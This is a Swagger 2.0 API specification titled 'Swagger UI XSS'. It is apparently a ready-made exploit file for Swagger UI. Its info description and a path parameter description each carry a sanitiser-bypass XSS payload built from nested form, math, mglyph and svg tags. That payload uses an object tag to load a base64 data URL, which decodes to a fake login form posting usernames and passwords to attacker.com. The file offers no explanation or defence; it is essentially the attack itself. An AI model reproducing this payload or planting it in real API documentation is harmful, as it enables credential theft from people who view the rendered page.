swagger: '2.0'
info:
  title: Swagger UI XSS
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><object data='data:text/html;base64,PGZvcm0gYWN0aW9uPWh0dHBzOi8vYXR0YWNrZXIuY29tOjQ0NDM+VXNlcm5hbWU6PGJyPgo8aW5wdXQgdHlwZT0idXNlcm5hbWUiIG5hbWU9InVzZXJuYW1lIj48L2JyPlBhc3N3b3JkOjxicj4KPGlucHV0IHR5cGU9InVzZXJuYW1lIiBuYW1lPSJwYXNzd29yZCI+PC9icj48YnI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiI+PC9icj4='></object>"></form>
  version: production
basePath: /XSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /hack/cdw:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - CDW
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hackid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><object data='data:text/html;base64,PGZvcm0gYWN0aW9uPWh0dHBzOi8vYXR0YWNrZXIuY29tOjQ0NDM+VXNlcm5hbWU6PGJyPgo8aW5wdXQgdHlwZT0idXNlcm5hbWUiIG5hbWU9InVzZXJuYW1lIj48L2JyPlBhc3N3b3JkOjxicj4KPGlucHV0IHR5cGU9InVzZXJuYW1lIiBuYW1lPSJwYXNzd29yZCI+PC9icj48YnI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiI+PC9icj4='></object>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified